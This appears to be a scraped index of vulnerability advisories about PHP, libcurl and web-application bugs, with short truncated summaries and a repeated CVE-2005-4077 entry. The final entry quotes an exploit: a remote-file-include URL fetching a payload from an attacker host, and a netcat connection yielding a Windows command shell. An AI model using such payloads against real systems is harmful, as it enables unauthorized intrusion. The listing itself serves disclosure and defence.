CVE-2005-4077

Multiple off-by-one errors in the cURL library libcurl 7.11.2 through 7.15.0 allow local users to trigger a buffer overflow and cause a denial of service or bypass PHP security restrictions via certain URLs that 1 are malformed in a way that prevents a terminating null byte from being added to...

CVE-2005-4077

Multiple off-by-one errors in the cURL library libcurl 7.11.2 through 7.15.0 allow local users to trigger a buffer overflow and cause a denial of service or bypass PHP security restrictions via certain URLs that 1 are malformed in a way that prevents a terminating null byte from being added to...

CVE-2005-4077

Multiple off-by-one errors in the cURL library libcurl 7.11.2 through 7.15.0 allow local users to trigger a buffer overflow and cause a denial of service or bypass PHP security restrictions via certain URLs that 1 are malformed in a way that prevents a terminating null byte from being added to...

CVE-2005-4077

CVE-2005-4077 affects libcurl (curl) versions 7.11.2–7.15.0, where multiple off-by-one errors can cause a buffer overflow. Exploitation is local and can trigger a denial of service or bypass PHP security restrictions via crafted URLs, either malformed to prevent a terminating null byte in hostnam...

[UNIX] MagpieRSS Remote Command Execution

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com - - promotion The SecuriTeam alerts list - Free, Accurate, Independent. Get your security news from a reliable source...

BlackBoard Internet Newsboard System remote file include flaw

The remote host is running the BlackBoard Internet Newsboard System, an open-source PHP-based internet bulletin board software. The remote version of this software is vulnerable to a remote file include flaw due to a lack of sanitization of user-supplied data. Successful exploitation of this issu...

PHP, ASP, CGI web applications security vulnerabilities

No description provided...

paFileDB fails to properly sanitize "query" parameter in "pafiledb.php"

Overview paFileDB works around the default "off" state for the "registerglobals" security directive in PHP and then fails to initialize the "query" variable, which can be used to inject arbitrary SQL queries. Description "paFileDB is designed to allow webmasters have a database of files for...

CVE-2004-2010

PHP remote file inclusion vulnerability in index.php in phpShop 0.7.1 and earlier allows remote attackers to execute arbitrary PHP code by modifying the basedir parameter to reference a URL on a remote web server that contains phpshop.cfg...

PHP, ASP, CGI web applications security vulnerabilities

PHP inclusions, SQL injections, directory traversals, crossite scripting, etc...

RHEL 4 : php (RHSA-2005:032)

The remote Redhat Enterprise Linux 4 host has packages installed that are affected by multiple vulnerabilities as referenced in the RHSA-2005:032 advisory. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. Flaws including possible information disclosure,...

PHP/ASP/CGI web applications security bugs

PHP inclusions, SQL injections, directory traversals, crossite scripting, spam sending, etc...

Important: Red Hat Security Advisory: php security update

Updated php packages that fix various security issues are now available for Red Hat Enterprise Linux 4. This update has been rated as having important security impact by the Red Hat Security Response Team. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server...

PHP/ASP/CGI web applications security bugs

PHP inclusions, SQL injections, directory traversals, crossite scripting, etc...

PHP/ASP/CGI web applications security bugs

PHP inclusions, SQL injections, directory traversals, crossite scripting, etc...

PHP/ASP/CGI web applications security vulnerabilities

PHP inclusions, SQL injections, directory traversals, crossite scripting, etc...

Important: Red Hat Security Advisory: php security update

Updated php packages that fix various security issues are now available for Red Hat Enterprise Linux 2.1. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. A double-free bug was found in the deserialization code of PHP. PHP applications use the unserialize...

RHEL 2.1 : php (RHSA-2005:031)

Updated php packages that fix various security issues are now available for Red Hat Enterprise Linux 2.1. PHP is an HTML-embedded scripting language commonly used with the Apache HTTP Web server. A double-free bug was found in the deserialization code of PHP. PHP applications use the unserialize...

CVE-2004-1020

The addslashes function in PHP 4.3.9 does not properly escape a NULL /0 character, which may allow remote attackers to read arbitrary files in PHP applications that contain a directory traversal vulnerability in require or include statements, but are otherwise protected by the magicquotesgpc...

PHP 4.3.7 - openlog() Remote Buffer Overflow

PHP 4.3.7 - openlog Remote Buffer Overflow http://www.vulnerable.box/remincl.php?page=http://3v1l.h4x0r.b0x/tooopenlog.php.txt BOOM.... netcat www.vulnerable.box 65535 Microsoft Windows 2000 versie 5.00.2195 C Copyright 1985-2000 Microsoft Corp. C:\Program Files\Apache Group\Apache2 --- Getting a...